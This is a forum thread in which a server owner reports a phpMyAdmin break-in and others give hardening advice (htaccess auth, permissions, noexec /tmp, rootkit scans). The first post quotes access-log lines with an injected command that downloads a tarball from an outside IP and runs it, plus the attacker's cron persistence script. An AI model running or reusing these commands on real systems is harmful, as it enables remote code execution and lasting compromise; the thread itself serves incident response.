# Hacked via Apache, how to prevent

## marxin

Hello everyone,

   I got hacked my apache via phpmyadmin, I found that a command has been launched with the folloving code from apache access_log:

```

88.191.14.38 - - [07/Nov/2009:00:08:55 +0100] "GET /phpmyadmin/config/config.inc.php?p=phpinfo();c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck HTTP/1.1" 200 180

88.191.14.38 - - [07/Nov/2009:00:08:55 +0100] "GET /?c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck HTTP/1.1" 200 44132

```

ls of my phpmyadmin directory:

ls -l /var/www/localhost/htdocs/phpmyadmin/ | grep config

```

drwxr-xrwx  4 apache apache    224 Nov 15 22:32 config

```

all files for hack were downloaded to directory and there is ls:

```

marxin_server .pid # ls

1  b2        cron.d  f   fuck  h    init  j2           mech.pid      mech.set  r  sl   stream  v   x

b  bang.txt  dir     f4  fwd   h.c  j     mech.levels  mech.session  plm.seen  s  std  tty     v2  y2kupdate

```

code of script which was executed at the startup of hack

```

#!/bin/sh

pwd > dir

dir=$(cat dir)

echo "* * * * * $dir/y2kupdate >/dev/null 2>&1" > cron.d

crontab cron.d

crontab -l | grep y2kupdate

echo "#!/bin/sh

if test -r $dir/mech.pid; then

pid=\$(cat $dir/mech.pid)

if \$(kill -CHLD \$pid >/dev/null 2>&1)

then

exit 0

fi

fi

cd $dir

./r &>/dev/null" > y2kupdate

chmod u+x y2kupdate

```

Thank you for your advices and I hope you will help me how to fix this hole in my server.

marxin

----------

## cach0rr0

so my first thoughts

-I personally despise mod_security, as well despise the idea of running regex against web requests in general, nevermind doing so as a component of Apache itself; nonetheless, updated mod_security rules will protect against most of these hacks

-this is an ancient hack, and has likely been fixed in more recent revisions of phpmyadmin

-if you can, i would protect phpmyadmin with .htaccess/.htpasswd. meaning, require form-based auth before anyone can even get TO a position where they can attack phpmyadmin. For example, putting this in .htaccess

```

AuthUserFile /var/www/passwords

AuthName "Restricted Access"

AuthType Basic

require valid-user

```

then creating that file via

```

htpasswd -c /var/www/passwords someusername

<enter your password twice when prompted>

```

to add subsequent users, omit the -c switch

```

htpasswd /var/www/passwords anotherusername

```

In short, password-protect phpmyadmin directory

Just in general this should be done; do not give attackers a chance to attack your application directly, make them brute-force an apache password if they want to even have a CHANCE to attack an application

I do this with everything that isn't a standard html page. I *ESPECIALLY* do this with very common webapps, such as phpmyadmin, Horde, etc. 

Now, with regards to tidying up your server, would highly recommend if you have physical access, booting from a thumb drive or cd/dvd and running rkhunter, chkrootkit, as well even clamscan (ClamAV). Personally even the slightest hack and I stop trusting my server, back things up, blow the server away and rebuild - but I'm paranoid in that respect. 

Hope that helps.

----------

## aidanjt

Why is your phpmyadmin dir even apache writable in the first place?

chown -R root:apache * && find -type d -exec chmod 750 {} \; && find -type f -exec chmod 640 {} \;

That will close off that nasty little hole.

----------

## Hu

Why was /tmp mounted -o exec on a system with PHP installed?

Whoever wrote that hack should be smacked.  That is a terrible shell script!  First, there is no need to write the current directory to a temporary file just to load it into a variable.  Second, crontab can be given data on stdin, so no need for the temporary cron.d, either.  Third, the if test to see if anything was killed is wrong.  Since all output is redirected to null, it is guaranteed to produce no output.  The attacker should have tested the return code of the kill, not the amount of output it generated.  Finally, since the attacker apparently wanted all output discarded, he should have just redirected output at the top of the script, rather than doing it for every child.

----------

